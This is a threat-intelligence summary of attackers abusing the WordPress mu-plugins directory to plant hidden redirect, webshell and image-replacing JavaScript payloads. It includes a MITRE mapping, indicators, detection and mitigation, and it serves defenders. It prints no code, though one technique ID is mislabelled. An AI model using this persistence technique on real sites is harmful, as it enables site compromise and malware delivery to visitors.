Full Report
Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. [...]
Analysis Summary
# Tool/Technique: WordPress MU-Plugin Abuse (Malicious Payloads)
## Overview
This describes a technique where attackers implant malicious PHP code within WordPress's Must-Use Plugins (MU-Plugins) directory to maintain persistence and execute various attacks. Because MU-plugins execute on every page load and are hidden from the standard WordPress Plugins administration page, they serve as a stealthy mechanism for ongoing site compromise.
## Technical Details
- Type: Technique / Malware Injection (using legitimate platform features)
- Platform: WordPress (PHP environment)
- Capabilities: Credential theft, HTML/content manipulation, forced redirects, remote code execution, malware distribution.
- First Seen: Not explicitly stated, but this abuse stems from known WordPress vulnerabilities.
## MITRE ATT&CK Mapping
Since this focuses on the method of execution and persistence rather than a specific named malware, mappings primarily cover Execution, Persistence, and Impact.
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.002 - PowerShell (If related scripts are involved, though here it's PHP)
- T1059.009 - Command and Scripting Interpreter: **Web Shells (Implied by index.php payload)**
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostarts: Persistence via PHP initialization files (MU-Plugins run on every load)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (Fetching PHP code from GitHub via webshell)
- **TA0001 - Initial Access** (Based on hypothesized entry vector)
- T1190 - Exploit Public-Facing Application (Exploiting vulnerable themes/plugins)
## Functionality
### Core Capabilities
The attackers utilize three primary malicious payloads planted in the `mu-plugins` directory:
1. **`redirect.php`**: Responsible for visitor redirection.
* Redirects site visitors (excluding bots and logged-in administrators) to a malicious external domain.
* The remote site displays a fake browser update prompt designed to trick users into downloading malware.
2. **`index.php` (Webshell)**: Functions as a persistent backdoor.
* Fetches and executes arbitrary PHP code hosted on an external GitHub repository, enabling remote command execution.
3. **`custom-js-loader.php`**: Used for client-side user impact.
* Loads malicious JavaScript that replaces all legitimate images on the site with explicit content.
* Hijacks outbound links, replacing them with shady popups.
### Advanced Features
* **Stealth**: MU-Plugins execute automatically on every page load but are not visible in the standard WordPress Plugin list, offering high stealth for persistence.
* **Remote Code Execution (via Webshell)**: Enables attackers to steal data and launch follow-on attacks against site members or visitors.
* **Reputation/SEO Damage**: The redirection and explicit content injection severely damage site reputation and search engine ranking.
## Indicators of Compromise
- File Hashes: N/A (Varies by specific payload deployment)
- File Names: `redirect.php`, `index.php`, `custom-js-loader.php` (within the `wp-content/mu-plugins/` directory)
- Registry Keys: N/A (Web environment)
- Network Indicators:
* `updatesnow[.]net` (Used for delivering fake update malware prompts)
* GitHub repository (Used by the webshell payload for fetching secondary commands/code)
- Behavioral Indicators:
* Unrecognized or unauthorized PHP files appearing in the `wp-content/mu-plugins/` directory.
* Outbound traffic to suspicious domains from the WordPress server initiated by PHP scripts attempting to load external code.
* Abnormal page loads resulting in immediate redirects for standard users.
* Client-side scripts replacing legitimate site images or hijacking link clicks.
## Associated Threat Actors
The context implies financially motivated operations, but specific named threat groups are **not identified** in the provided text.
## Detection Methods
- Signature-based detection: Identifying the presence of the specific malicious PHP code snippets within MU-plugin files.
- Behavioral detection: Monitoring PHP processes for unauthorized external connections, especially to GitHub or known malicious domains, or detecting excessive link/content alteration during page rendering.
- YARA rules: Can be developed to detect specific string patterns or file structures associated with these three known payloads.
## Mitigation Strategies
- Apply security updates immediately to all WordPress core components, themes, and plugins to prevent initial exploitation.
- Disable or uninstall any themes or plugins that are no longer needed.
- Protect privileged accounts (Administrators) with strong, unique passwords and mandatory Multi-Factor Authentication (MFA).
- Monitor the `wp-content/mu-plugins/` directory for unauthorized file creation or modification.
## Related Tools/Techniques
* Standard WordPress Webshells
* Exploits targeting vulnerable WordPress Plugins/Themes (Hypothesized Initial Access vector)